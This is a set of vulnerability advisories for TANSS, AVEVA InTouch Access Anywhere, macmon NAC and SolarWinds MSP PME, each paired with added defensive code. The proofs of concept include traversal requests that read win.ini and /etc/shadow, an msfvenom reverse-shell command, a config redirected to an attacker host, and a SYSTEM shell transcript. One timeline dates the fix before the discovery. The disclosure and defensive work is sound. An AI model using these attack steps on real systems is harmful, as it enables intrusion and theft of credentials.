Author:

Jens Regel & Jens Gödde

Affected version

TANSS version 5.8.23.2 and earlier

Fixed version

TANSS 5.8.23.3

Timeline

  • 2023-05-18 Vulnerabilities discovered
  • 2023-05-26 Sent details to vendor
  • 2023-05-27 Vendor confirmed the vulnerability
  • 2023-05-05 Vendor released fix
  • 2023-07-03 CVE request
  • 2023-07-18 CVE assigned
  • 2023-07-21 Public disclosure

Description

During a penetration test, we identified several vulnerabilities in the TANSS 5.8 ticket system. These include 2 SQL injection vulnerabilities and a reflected cross-site scripting vulnerability. Furthermore, several libraries with already known vulnerabilities were identified, which can be exploited by attackers.

The SQL injection vulnerabilities make it possible, for example, to read all session IDs from the table tanss.session and to set one of them as the session cookie in the browser in order to log on in the context of another user.

[1] SQL injection

CVE ID: CVE-2023-37736
CVSS: 8.3 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

We have identified 2 SQL injection vulnerabilities in the HTTP GET parameters:

  • index.php?section=stammdaten&sub=mitarbeiter_show&maID=[SQLi]
  • index.php?section=stammdaten&sub=domain&task=view&id=[SQLi]

These can be exploited using UNION SELECT statements to inject malicious SQL commands. The content of the table tanss.config can be read out as shown in the screenshot below. It is also possible to escalate privileges by extracting the active session IDs from the tanss.session table and then using them as session cookies to log on to TANSS in the context of another user.
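The root cause of both findings is the pattern of pasting a request parameter into the SQL text. The following is an added example, not code from TANSS or from the advisory: a toy sqlite3 schema (table and column names are assumptions, not TANSS's real schema) with the weak pattern and the hardened pattern side by side. The weak lookup returns rows from a second table when the maID parameter carries a UNION clause; the hardened lookup validates the type and binds the value, so the same input is rejected and could never alter the query structure.

```python
import sqlite3

# Constructed toy schema standing in for tanss.mitarbeiter / tanss.session;
# column names are assumptions for this demo, not TANSS's real schema.
def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE mitarbeiter (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE session (id INTEGER PRIMARY KEY, session_id TEXT, user_id INTEGER);
        INSERT INTO mitarbeiter VALUES (1, 'alice'), (2, 'bob');
        INSERT INTO session VALUES (1, 'sess-alice-0001', 1), (2, 'sess-bob-0002', 2);
        """
    )
    return conn


def show_employee_vulnerable(conn: sqlite3.Connection, ma_id: str) -> list:
    # Weak pattern: the request parameter is pasted into the statement text, so any
    # SQL syntax it contains becomes part of the query. This is the pattern a
    # UNION-based injection exploits.
    sql = f"SELECT id, name FROM mitarbeiter WHERE id = {ma_id}"
    return conn.execute(sql).fetchall()


def show_employee_fixed(conn: sqlite3.Connection, ma_id: str) -> list:
    # Hardened pattern: validate the expected type first, then bind the value as a
    # parameter. A bound value is data only and cannot change the statement structure.
    if not ma_id.isdigit():
        raise ValueError("maID must be a non-negative integer")
    return conn.execute(
        "SELECT id, name FROM mitarbeiter WHERE id = ?", (int(ma_id),)
    ).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    # Constructed input of the UNION SELECT kind described in the advisory.
    tampered = "0 UNION SELECT id, session_id FROM session"
    print("vulnerable:", show_employee_vulnerable(db, tampered))
    try:
        show_employee_fixed(db, tampered)
    except ValueError as err:
        print("fixed:", err)
```

The type check is not a substitute for binding: an integer-only parameter still belongs in a placeholder, and a parameter that legitimately takes free text (a search string, for example) can only be made safe by binding, not by validation.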

Demo:

[2] Cross-site scripting

CVE ID: CVE-2023-37735
CVSS: 7.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

A reflected cross-site scripting vulnerability exists in the HTTP GET parameter index.php?section=bug&sub=[XSS]. As an example, it is possible to mislead users and obtain sensitive information using a manipulated link. In the screenshot below, the JavaScript variable SessionConfiguration.api.key embedded in the HTML code, which contains the bearer token for the TANSS API, is read out. With the additional use of the Fetch API, it would also be possible to send the API key to the attacker.
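As an added example, not code from TANSS or from the advisory, the handler below shows the weak pattern (the sub parameter echoed verbatim into the HTML) next to a hardened one. The allowlist of sub-pages and the Content-Security-Policy value are assumptions for this demo. The hardened handler treats sub as a routing parameter that may only take known values, HTML-escapes whatever it echoes back, and sends a CSP that blocks inline script as a second layer in case an escaping bug is ever reintroduced.

```python
import html

# Constructed allowlist of sub-pages for section=bug; TANSS's real routing table is
# not given in the advisory and is assumed here.
ALLOWED_BUG_SUBS = frozenset({"list", "show", "new"})

# Assumed policy: no inline script, no plugins, no <base> hijacking.
CONTENT_SECURITY_POLICY = (
    "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"
)


def render_bug_page_vulnerable(sub: str) -> tuple:
    # Weak pattern: the parameter is copied into the HTML body unchanged, so any
    # markup it contains is rendered and any script it contains runs.
    return 200, {"Content-Type": "text/html; charset=utf-8"}, f"<h1>Bugs: {sub}</h1>"


def render_bug_page(sub: str) -> tuple:
    """Return (status, headers, body) for index.php?section=bug&sub=<sub>."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CONTENT_SECURITY_POLICY,
    }
    # Layer 1: a routing parameter only ever takes known values.
    if sub not in ALLOWED_BUG_SUBS:
        # Layer 2: anything echoed back is HTML-escaped, quotes included, so it
        # cannot break out of the element it is placed in.
        body = f"<p>Unknown sub-page: {html.escape(sub, quote=True)}</p>"
        return 400, headers, body
    body = f"<h1>Bugs: {html.escape(sub, quote=True)}</h1>"
    return 200, headers, body


if __name__ == "__main__":
    hostile = "<script>alert(1)</script>"
    print("vulnerable:", render_bug_page_vulnerable(hostile)[2])
    print("hardened:  ", render_bug_page(hostile))
```

Escaping must match the context: html.escape is correct for element content and quoted attribute values, but a value placed inside a script block or a URL needs the encoding for that context instead.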

Demo:


[3] Using Components with Known Vulnerabilities

In the TANSS web application, several JavaScript libraries are integrated in outdated and vulnerable versions, which can be used to execute malicious code.

Library: PHPMailer 5.2.14
URL: https://tanss/vendor/php_mailer/changelog.md
CVE ID: CVE-2016-10033, CVE-2016-10045, CVE-2017-5223, CVE-2017-11503, CVE-2018-19296, CVE-2020-13625, CVE-2021-34551, CVE-2021-3603
CWE-1395: Dependency on Vulnerable Third-Party Component

Library: jQuery 1.10.2
URL: https://tanss/ajax/jquery/jquery-1.10.2.js
CVE ID: CVE-2015-9251, CVE-2016-10707, CVE-2020-11023, CVE-2020-11022
CWE-1395: Dependency on Vulnerable Third-Party Component

Library: jQuery UI 1.10.4
URL: https://tanss/ajax/jquery/jquery-ui-1.10.4.custom.min.js
CVE ID: CVE-2021-41183, CVE-2021-41182, CVE-2021-41184, CVE-2022-31160
CWE-1395: Dependency on Vulnerable Third-Party Component

Title: AVEVA InTouch Access Anywhere Secure Gateway – Path Traversal

Author: Jens Regel, CRISEC IT-Security https://crisec.de

Timeline:
25.06.2021 Vulnerability discovered
25.06.2021 Sent details to custfirstsupport@aveva.com
21.09.2021 Vendor response, fix to be available by Q1/2022
25.09.2021 Vendor released Tech Alert TA000022335
06.09.2022 Public disclosure

CVE: CVE-2022-23854

Vendor:
AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).

Affected Products:
InTouch Access Anywhere Secure Gateway versions 2020 R2 and older

Details:
A security vulnerability exists in InTouch Access Anywhere Secure Gateway versions 2020 R2 and older. This is a Relative Path Traversal vulnerability which allows an unauthenticated user with network access to the Secure Gateway to read files on the system outside of the Secure Gateway web server.

Proof of Concept:

GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1

HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Fix:
InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) Hotfix
InTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix

macmon NAC – Directory Traversal

Author: Jens Regel

CVSSv3: 8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVE: Not assigned

CWE: https://cwe.mitre.org/data/definitions/23.html

Vulnerable version

macmon NAC before version 5.14.0.2

Timeline

  • 01.04.2019 Vulnerability discovered
  • 01.04.2019 Sent details to security@macmon.eu
  • 02.04.2019 Vulnerability was fixed by vendor
  • 28.04.2020 Public disclosure

Description

The HTTP GET parameter ?__address is susceptible to a directory traversal attack. The vulnerability can be exploited without prior authentication. The Apache server is running with root privileges, which also makes it possible to read /etc/shadow.

Proof of Concept (PoC)

:~$ curl -i -k https://macmonip/login/?__address=../../../../../../../../etc/shadow
HTTP/1.1 200 OK
Date: Mon, 01 Apr 2019 13:23:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1094
Content-Type: text/plain;charset=UTF-8

root:!:17801:0:99999:7:::
daemon:*:17801:0:99999:7:::
bin:*:17801:0:99999:7:::
sys:*:17801:0:99999:7:::
sync:*:17801:0:99999:7:::
games:*:17801:0:99999:7:::
man:*:17801:0:99999:7:::
lp:*:17801:0:99999:7:::
mail:*:17801:0:99999:7:::
news:*:17801:0:99999:7:::
uucp:*:17801:0:99999:7:::
proxy:*:17801:0:99999:7:::
www-data:*:17801:0:99999:7:::
backup:*:17801:0:99999:7:::
list:*:17801:0:99999:7:::
irc:*:17801:0:99999:7:::
gnats:*:17801:0:99999:7:::
nobody:*:17801:0:99999:7:::
systemd-timesync:*:17801:0:99999:7:::
systemd-network:*:17801:0:99999:7:::
systemd-resolve:*:17801:0:99999:7:::
systemd-bus-proxy:*:17801:0:99999:7:::
Debian-exim:!:17801:0:99999:7:::
messagebus:*:17801:0:99999:7:::
statd:*:17801:0:99999:7:::
mysql:!:17801:0:99999:7:::
macmon:*:17801:0:99999:7:::
postfix:*:17801:0:99999:7:::
snmp:*:17801:0:99999:7:::
arpwatch:!:17801:0:99999:7:::
bind:*:17801:0:99999:7:::
freerad:*:17801:0:99999:7:::
hacluster:*:17801:0:99999:7:::
sshd:*:17801:0:99999:7:::
admin:$6$L1prUJGM$ENNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:17920:0:99999:7:::
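Both the Secure Gateway finding above (double percent-encoded, backslash-separated) and the macmon __address finding (plain ../ in a query value) are the same class of bug seen from the log. The following is an added example, not code from either vendor or from the advisories, with constructed log lines in Apache combined format. It does two things a defender wants: it scans request lines for traversal sequences after decoding repeatedly and normalising backslashes (a single decode misses %252e), checking both the URL path and every query-string value; and it shows the server-side counterpart, a resolver that maps a request onto a file under a base directory and refuses anything that resolves outside it. The base directory /srv/www is an assumption.

```python
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Extracts the request target from an Apache-style request line: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST|PUT|DELETE) (\S+) HTTP/\d\.\d"')

# Constructed access-log lines (not from either vendor's systems). Line 1 mirrors the
# double-encoded Secure Gateway request, line 2 the macmon __address request; lines 3
# and 4 are benign, and line 4 contains '..' inside a filename, which must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Jun/2021:10:00:01 +0200] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 92',
    '10.0.0.6 - - [01/Apr/2019:13:23:44 +0000] "GET /login/?__address=../../../../etc/shadow HTTP/1.1" 200 1094',
    '10.0.0.7 - - [01/Apr/2019:13:25:00 +0000] "GET /login/?__address=10.0.0.7 HTTP/1.1" 200 512',
    '10.0.0.8 - - [01/Apr/2019:13:26:00 +0000] "GET /static/app..min.js HTTP/1.1" 200 4096',
]


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so %252e -> %2e -> '.'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_parent_segment(value: str) -> bool:
    """True if the fully decoded value contains '..' as a whole segment ('/' or '\\')."""
    return ".." in decode_fully(value).replace("\\", "/").split("/")


def is_traversal(request_target: str) -> bool:
    """Check the URL path and every query-string value of a request target."""
    parts = urlsplit(request_target)
    candidates = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return any(has_parent_segment(c) for c in candidates)


def scan_access_log(lines) -> list:
    """Return (line_number, decoded_target) for each request carrying a traversal sequence."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group(1)):
            hits.append((number, decode_fully(match.group(1))))
    return hits


def safe_resolve(base_dir: str, requested: str) -> str:
    """Map a request onto a file under base_dir, or refuse it.

    The request is fully decoded, backslashes are normalised, and the resolved
    absolute path must still lie within the real base directory.
    """
    base = os.path.realpath(base_dir)
    relative = decode_fully(requested).replace("\\", "/").lstrip("/")
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing {requested!r}: resolves outside {base}")
    return target


if __name__ == "__main__":
    for number, target in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: traversal in {target}")
```

The resolver compares real paths on both sides deliberately: comparing the unresolved string prefix would let a symlink inside the base directory point outside it.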

Fix

Fixed in version 5.14.0.2.


SolarWinds MSP PME Cache Service – Insecure File Permissions / Code Execution

Author: Jens Regel

CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12608

CWE: https://cwe.mitre.org/data/definitions/276.html

Vulnerable version

SolarWinds MSP PME (Patch Management Engine) before 1.1.15

Timeline

  • 2020-04-24 Vulnerability discovered
  • 2020-04-27 Sent details to SolarWinds PSIRT
  • 2020-04-27 SolarWinds confirmed the vulnerability
  • 2020-05-05 SolarWinds released PME version 1.1.15
  • 2020-05-06 Public disclosure

Description

The SolarWinds MSP Cache Service, which is part of the Advanced Monitoring Agent, ships with insecure file permissions that can lead to code execution. The SolarWinds MSP Cache Service is typically used to fetch new update definition files and versions for ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The XML file CacheService.xml in %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so the parameter SISServerURL, which controls the location of the updates, can be changed. After some analysis, we were able to provide modified XML files (PMESetup_details.xml and ThirdPartyPatch_details.xml) that point to an executable file with a reverse TCP payload, served from a web server under our control that the SolarWinds MSP Cache Service reached via the changed SISServerURL.

Proof of Concept (PoC)

As the icacls output shows, the NTFS Modify (M) permission is granted on CacheService.xml to the built-in Users group by default, so any local user in that group can change the file content. This is especially a big problem on terminal servers or multi-user systems.

PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml
.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
                   NT-AUTORITÄT\SYSTEM:(I)(F)
                   VORDEFINIERT\Administratoren:(I)(F)

1. Modify CacheService.xml

In the XML file, the parameter SISServerURL was changed to point to a web server controlled by the attacker.

<?xml version="1.0" encoding="utf-8"?>
<Configuration>
	<CachingEnabled>True</CachingEnabled>
	<ApplianceVersion>1.1.14.2223</ApplianceVersion>
	<CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation>
	<CacheSizeInMB>10240</CacheSizeInMB>
	<SISServerURL>https://evil-attacker.example.org</SISServerURL>
	<LogLevel>5</LogLevel>
	<Proxy></Proxy>
	<ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt>
	<ProxyCacheService />
	<CacheFilesDeleted></CacheFilesDeleted>
	<CacheDeletedInBytes></CacheDeletedInBytes>
	<HostApplication>RMM</HostApplication>
	<CanBypassProxyCacheService>True</CanBypassProxyCacheService>
	<BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds>
	<ComponentUpdateMinutes>300</ComponentUpdateMinutes>
	<ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds>
</Configuration>

2. Payload creation

Generate an executable file, for example using msfvenom, that establishes a reverse TCP connection to the attacker, and store it on the web server.

msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe

3. Prepare web server

Place the modified XML files (PMESetup_details.xml or ThirdPartyPatch_details.xml) on the web server under the path /ComponentData/RMM/1/, generate the MD5, SHA1 and SHA256 hashes of the executable, set the correct value for SizeInBytes and increase the version number.

Example of PMESetup_details.xml

<ComponentDetails>
<Name>Patch Management Engine</Name>
<Description>Patch Management Engine</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.1.14.2224</Version>
</ComponentDetails>

Example of ThirdPartyPatch_details.xml

<ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Name>Third Party Patch</Name>
<Description>
Third Party Patch application for Patch Management Engine RMM v 1 and later
</Description>
<MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum>
<SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum>
<SHA256Checksum>
80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
</SHA256Checksum>
<SizeInBytes>7168</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL>
<FileName>solarwinds-shell.exe</FileName>
<Architecture>x86,x64</Architecture>
<Locale>all</Locale>
<Version>1.2.1.95</Version>
</ComponentDetails>

4. Malicious executable download

After restarting the system or reloading the CacheService.xml, the service connects to the web server controlled by the attacker and downloads the executable file. This is then stored under %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and %PROGRAMDATA%\SolarWinds MSP\PME\archives\.

[24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
[24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"

5. Getting shell

After a certain time the executable file is executed by the SolarWinds MSP RPC Server service and establishes a connection to the attacker with the rights of the SYSTEM user.

[~]: nc -nlvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
Microsoft Windows [Version 10.0.18363.778]
(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.

C:\WINDOWS\system32>whoami
whoami
nt-authority\system

C:\WINDOWS\system32>
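The chain above works because the update source is taken from a user-writable file and because the manifest that vouches for the download (hashes, size, version) comes from that same source. The following is an added example, not code from SolarWinds or from the advisory, that makes both points in defender's terms. It audits a constructed CacheService.xml for a SISServerURL that is not an https URL to a pinned update host (the host sis.vendor.example is a placeholder; the advisory does not name the vendor's real update server), and it verifies a constructed ComponentDetails manifest against constructed payload bytes. The ordering in evaluate_update is the lesson: a manifest and a payload that agree with each other only prove that whoever served them computed the hashes correctly, so the digest check is worthless until the origin has been established. The real fix remains the vendor's 1.1.15 release and correct ACLs on the config directory; this check is a compensating control.

```python
import hashlib
import xml.etree.ElementTree as ET  # for truly untrusted XML prefer defusedxml
from urllib.parse import urlsplit

# Placeholder for the vendor's real update host, which the advisory does not name.
TRUSTED_UPDATE_HOSTS = frozenset({"sis.vendor.example"})

# Constructed stand-in for a downloaded component; not a real executable.
SAMPLE_PAYLOAD = b"MZ-constructed-sample-component-bytes"


def _config(sis_url: str) -> str:
    # Minimal constructed CacheService.xml with only the fields this check reads.
    return (
        "<Configuration>\n"
        "\t<CachingEnabled>True</CachingEnabled>\n"
        f"\t<SISServerURL>{sis_url}</SISServerURL>\n"
        "\t<HostApplication>RMM</HostApplication>\n"
        "</Configuration>"
    )


CONFIG_EXPECTED = _config("https://sis.vendor.example")
CONFIG_TAMPERED = _config("https://evil-attacker.example.org")

# Constructed manifest in the PMESetup_details.xml layout. Its digests are computed over
# SAMPLE_PAYLOAD, so it is self-consistent whoever serves it.
SAMPLE_MANIFEST = f"""<ComponentDetails>
<Name>Patch Management Engine</Name>
<MD5Checksum>{hashlib.md5(SAMPLE_PAYLOAD).hexdigest()}</MD5Checksum>
<SHA1Checksum>{hashlib.sha1(SAMPLE_PAYLOAD).hexdigest()}</SHA1Checksum>
<SHA256Checksum>
{hashlib.sha256(SAMPLE_PAYLOAD).hexdigest()}
</SHA256Checksum>
<SizeInBytes>{len(SAMPLE_PAYLOAD)}</SizeInBytes>
<DownloadURL>/ComponentData/RMM/1/component.exe</DownloadURL>
<Version>1.1.14.2224</Version>
</ComponentDetails>"""


def audit_update_source(config_xml: str) -> list:
    """Report a SISServerURL that is not an https URL to a trusted update host."""
    root = ET.fromstring(config_xml)
    url = (root.findtext("SISServerURL") or "").strip()
    parts = urlsplit(url)
    findings = []
    if parts.scheme != "https":
        findings.append(f"SISServerURL scheme is {parts.scheme!r}, expected https")
    if parts.hostname not in TRUSTED_UPDATE_HOSTS:
        findings.append(f"SISServerURL host {parts.hostname!r} is not a trusted update host")
    return findings


def manifest_matches_payload(manifest_xml: str, payload: bytes) -> bool:
    """Self-consistency check: digests and size in the manifest match the bytes."""
    root = ET.fromstring(manifest_xml)
    expected = {
        "MD5Checksum": hashlib.md5(payload).hexdigest(),
        "SHA1Checksum": hashlib.sha1(payload).hexdigest(),
        "SHA256Checksum": hashlib.sha256(payload).hexdigest(),
        "SizeInBytes": str(len(payload)),
    }
    return all(
        (root.findtext(tag) or "").strip().lower() == value for tag, value in expected.items()
    )


def evaluate_update(config_xml: str, manifest_xml: str, payload: bytes) -> str:
    """Decide whether a fetched component may be installed.

    Origin first: hashes from an untrusted manifest add nothing, so the source check
    gates the digest check rather than the other way round.
    """
    findings = audit_update_source(config_xml)
    if findings:
        return "reject: " + "; ".join(findings)
    if not manifest_matches_payload(manifest_xml, payload):
        return "reject: manifest does not match payload"
    return "accept"


if __name__ == "__main__":
    print("tampered config:", evaluate_update(CONFIG_TAMPERED, SAMPLE_MANIFEST, SAMPLE_PAYLOAD))
    print("expected config:", evaluate_update(CONFIG_EXPECTED, SAMPLE_MANIFEST, SAMPLE_PAYLOAD))
```

Pinning the host is the minimum; a manifest signed with a vendor key that the client verifies before reading any field would let the client reject a rogue server even if the host check were bypassed.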

Fix

There is a new PME version 1.1.15, which is delivered via auto-update.